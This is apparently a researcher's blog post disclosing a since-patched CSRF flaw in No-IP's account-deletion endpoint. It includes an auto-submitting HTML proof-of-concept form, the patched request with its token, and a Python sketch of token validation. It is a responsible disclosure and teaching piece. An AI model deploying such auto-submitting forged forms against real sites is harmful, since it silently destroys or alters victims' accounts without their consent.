A Flashback of my Childhood – NOIP XSRF

No-IP is a free dynamic DNS service. I signed up for an account when I was eleven, a long time back. I mainly used it for configuring my RATs (Remote Administration Tools), pointing a No-IP hostname at my external IP so the connections were forwarded to me. So that was a long time ago and I only used it for testing purposes. After that I never wanted to use a DNS service for any reason. One day I accidentally visited No-IP and, to my surprise, the old account I had created long ago was still active 🙂

I did not have any intention of finding any kind of vulnerability. But at that moment my Burp Suite was in intercept mode and I was experimenting with another web application. I created a new No-IP account for testing some of my reverse TCP DNS shells. After the testing was done I simply deleted the account, since it was a throwaway one. As time passed, while testing my other application and my shells, I noticed the HTTP request for the deletion of my fake No-IP account in the Burp history. It carried no XSRF token. W00t! Since the browser attaches the session cookie to any cross-site POST, I could delete any logged-in user's account as soon as that user opened my malicious page. Here is the proof of concept:

<html>
  <!--
	Title: NOIP.COM Permanent Delete Account Exploit
	Author: Osanda Malith (@OsandaMalith)
	Date: 05th April 2014
  -->
  <body>
    <form name="exploit" action="https://www.noip.com/members/account/delete.php" method="POST">
      <input type="hidden" name="deleteAccount" value="yes" />
      <input type="hidden" name="delete" value="delete" />
      <input type="hidden" name="submit" value="Change" />
      <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>

As soon as I found this I reported it to NoIP and I got rewarded with two t-shirts, some stickers and a nice letter 🙂

The issue is now patched: the delete request carries a per-session token, as the captured request below shows.

POST /members/account/delete.php HTTP/1.1
Host: www.noip.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.noip.com/members/account/delete.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

token=glXd3wIAPR8y2y9O&delete=delete&submit=Delete+Account
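To make the before/after concrete, here is an added example (my own illustration, not No-IP's code) of the server-side check that the token in the patched request enables. The session store, the handler name handle_delete and the in-memory sessions are all assumptions standing in for whatever the real delete.php does; the two request bodies fed to it are constructed from the PoC form above and from the patched capture.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# In-memory stand-in for the server-side session store (assumption: the real
# site keeps something equivalent, keyed by the session cookie).
SESSIONS = {}


def new_session(username):
    """Log a user in: mint a session id and bind a fresh CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {
        "user": username,
        "csrf": secrets.token_urlsafe(12),  # synchronizer token for this session
        "deleted": False,
    }
    return sid


def csrf_token_for(sid):
    """The value the legitimate delete page embeds as <input name="token">."""
    return SESSIONS[sid]["csrf"]


def parse_body(body):
    """Parse an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def handle_delete(sid, form):
    """Simulate POST /members/account/delete.php (hypothetical handler).

    `sid` is whatever the browser's cookie says; the browser sends it even when
    the POST comes from an attacker's page. `form` is the parsed body.
    Returns (status, message).
    """
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    submitted = form.get("token", "")
    # Constant-time compare of the submitted token against the session's copy.
    # A cross-site form cannot read the victim's page, so it cannot know it.
    if not hmac.compare_digest(submitted.encode(), session["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    if form.get("delete") != "delete":
        return 400, "bad request"
    session["deleted"] = True
    # Rotate the token after a state-changing action so it cannot be replayed.
    session["csrf"] = secrets.token_urlsafe(12)
    return 200, f"account {session['user']} deleted"


def demo():
    """Run the original PoC body and the patched body against the handler."""
    sid = new_session("victim")
    # 1. The PoC form: no token field, so it is refused even though the cookie
    #    (and therefore the session) is valid.
    attack = parse_body("deleteAccount=yes&delete=delete&submit=Change")
    blocked = handle_delete(sid, attack)
    # 2. The patched flow: token taken from a page the victim actually loaded.
    legit = parse_body(f"token={csrf_token_for(sid)}&delete=delete&submit=Delete+Account")
    allowed = handle_delete(sid, legit)
    return blocked, allowed


if __name__ == "__main__":
    print(demo())
```

The token check is what defeats the auto-submitting form: the attacker's page can make the victim's browser send the cookie, but not guess a value that only exists in the victim's session and page. A SameSite attribute on the session cookie is a sensible second layer, but the per-request token is the fix that No-IP shipped and the one a reviewer should insist on.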

So this bug reminded me of my childhood 🙂 Nothing serious, it's just XSRF. I never used DNS services for spreading malware or anything unethical; as a kid I used them purely out of curiosity, to learn.
